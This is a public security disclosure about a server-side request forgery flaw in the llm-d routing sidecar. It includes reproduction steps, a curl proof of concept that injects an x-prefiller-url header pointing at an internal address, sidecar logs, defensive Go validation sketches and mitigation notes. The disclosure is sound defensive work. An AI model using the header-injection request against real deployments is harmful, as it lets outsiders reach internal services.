Description
Disclaimer
Since the project is new and I've not seen any responsible disclosure process documented (as stated here https://llm-d.ai/docs/community/contribute#security), I'm creating a public issue in the hope that many are still only experimenting with llm-d and it's not affecting their production setup.
Problem
There is a potential for Server-Side Request Forgery (SSRF).
The routing sidecar honors the x-prefiller-url and x-prefiller-host-port headers. However, I'd expect the scheduler or Gateway (at least) not to pass these headers through from external, user-provided requests.
This allows a malicious external user to craft a request that forces the sidecar to forward the prefill stage of the request to an arbitrary URL or host:port. This bypasses the intended routing logic managed by the scheduler.
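To make the missing check concrete, here is a minimal Go sketch of the kind of target validation one might expect before the sidecar forwards a prefill request. It is not taken from the llm-d code base: the allowlist, its single entry, and the function names (allowedPrefillers, hostPortFromURL, checkPrefillTarget) are all hypothetical, and a real deployment would presumably derive the allowed endpoints from the scheduler or the InferencePool rather than from a hard-coded map.

```go
package main

import (
	"fmt"
	"net/url"
)

// allowedPrefillers is a HYPOTHETICAL allowlist of prefill endpoints
// (host:port). The entry below is a made-up example address.
var allowedPrefillers = map[string]bool{
	"10.244.0.12:8000": true,
}

// hostPortFromURL extracts host:port from an x-prefiller-url style value.
// It rejects non-HTTP schemes and values without an explicit port.
func hostPortFromURL(raw string) (string, error) {
	u, err := url.Parse(raw)
	if err != nil {
		return "", err
	}
	if u.Scheme != "http" && u.Scheme != "https" {
		return "", fmt.Errorf("unsupported scheme %q", u.Scheme)
	}
	if u.Port() == "" {
		return "", fmt.Errorf("missing port in %q", raw)
	}
	return u.Host, nil
}

// checkPrefillTarget returns an error unless the target is on the allowlist.
func checkPrefillTarget(raw string) error {
	hostPort, err := hostPortFromURL(raw)
	if err != nil {
		return err
	}
	if !allowedPrefillers[hostPort] {
		return fmt.Errorf("prefill target %q is not allowed", hostPort)
	}
	return nil
}

func main() {
	targets := []string{"http://10.244.0.12:8000", "http://10.244.0.51:8000"}
	for _, target := range targets {
		if err := checkPrefillTarget(target); err != nil {
			fmt.Println("rejected:", err)
			continue
		}
		fmt.Println("accepted:", target)
	}
}
```

With a check along these lines, a header value pointing at an arbitrary address such as http://10.244.0.51:8000 would be refused instead of forwarded.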
To Reproduce
- Deploy a model fronted by Gateway and the inference scheduler on a cluster (e.g., KinD).
- Send a POST request to the model's inference endpoint via the gateway.
- In the request, include the header x-prefiller-url pointing to an arbitrary internal service address.
- Observe that the request is successfully processed by the unintended service.
Example curl command
The following command was sent to the gateway at 172.18.0.3. It includes the x-prefiller-url header, which points to an arbitrary internal address, http://10.244.0.51:8000. The request succeeds with a 200 OK status, indicating that the sidecar forwarded the request as instructed by the header.
curl -v -XPOST \
-H "x-prefiller-url: http://10.244.0.51:8000" \
-H "Content-Type: application/json" \
-d '{"model": "facebook/opt-125m", "prompt": "Write a poem about colors...", "stream": false, "max_tokens": 400}' \
http://172.18.0.3/default/facebook-opt-125m-pd/v1/completions
The sidecar then logs entries like these:
I0703 09:55:11.606604 1 chat_completions.go:310] "sending request to prefiller" logger="proxy server" url="http://10.244.0.51:8000/" body="{\"do_remote_decode\":true,\"max_tokens\":400,\"model\":\"facebook/opt-125m\",\"prompt\":\"Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, a very long one please\",\"stream\":false}"
I0703 09:55:12.898331 1 chat_completions.go:334] "warning: missing 'remote_block_ids' field in prefiller response" logger="proxy server"
I0703 09:55:12.898347 1 chat_completions.go:340] "warning: missing 'remote_engine_id' field in prefiller response" logger="proxy server"
I0703 09:55:12.898351 1 chat_completions.go:346] "warning: missing 'remote_host' field in prefiller response" logger="proxy server"
I0703 09:55:12.898355 1 chat_completions.go:352] "warning: missing 'remote_port' field in prefiller response" logger="proxy server"
I0703 09:55:12.898361 1 chat_completions.go:355] "received prefiller response" logger="proxy server" remote_block_ids=null remote_engine_id=null remote_host=null remote_port=null
I0703 09:55:12.898389 1 chat_completions.go:393] "sending request to decoder" logger="proxy server" body="{\"do_remote_prefill\":true,\"max_tokens\":400,\"model\":\"facebook/opt-125m\",\"prompt\":\"Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, a very long one please\",\"remote_block_ids\":null,\"remote_engine_id\":null,\"remote_host\":null,\"remote_port\":null,\"stream\":false}"
Notes
- An egress network policy can mitigate the issue for both external and cluster-internal traffic. However, it is not simple to configure out of the box, since vLLM needs to reach Hugging Face and other hosts to download the model(s).
- It is unclear whether an HTTPRoute filter that removes the header would mitigate the issue without breaking the P/D functionality, since filters are applied before the "action" (I'm not sure what that means in the context of InferencePool and ExtProc).
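The header-removal idea from the second note can be illustrated in Go as a plain net/http middleware. This is only an in-process analogue of what an HTTPRoute filter would do, not llm-d or Gateway API code; the names stripPrefillHeaders and stripUntrusted are hypothetical. As the note says, it would only help if it runs on the untrusted request before the scheduler sets its own routing headers.

```go
package main

import (
	"fmt"
	"net/http"
)

// prefillHeaders lists the routing headers named in this issue.
var prefillHeaders = []string{"x-prefiller-url", "x-prefiller-host-port"}

// stripPrefillHeaders deletes the routing headers from h in place.
func stripPrefillHeaders(h http.Header) {
	for _, name := range prefillHeaders {
		h.Del(name) // Del canonicalizes the header name before deleting
	}
}

// stripUntrusted wraps a handler so that client-supplied routing headers
// never reach it. HYPOTHETICAL placement: it must sit in front of whatever
// component legitimately sets these headers.
func stripUntrusted(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		stripPrefillHeaders(r.Header)
		next.ServeHTTP(w, r)
	})
}

func main() {
	h := http.Header{}
	h.Set("x-prefiller-url", "http://10.244.0.51:8000")
	h.Set("Content-Type", "application/json")

	stripPrefillHeaders(h)

	fmt.Println("x-prefiller-url removed:", h.Get("x-prefiller-url") == "")
	fmt.Println("Content-Type kept:", h.Get("Content-Type") != "")
}
```

Stripping at the edge and validating in the sidecar are complementary: the first keeps untrusted values out, the second limits the damage if one gets through.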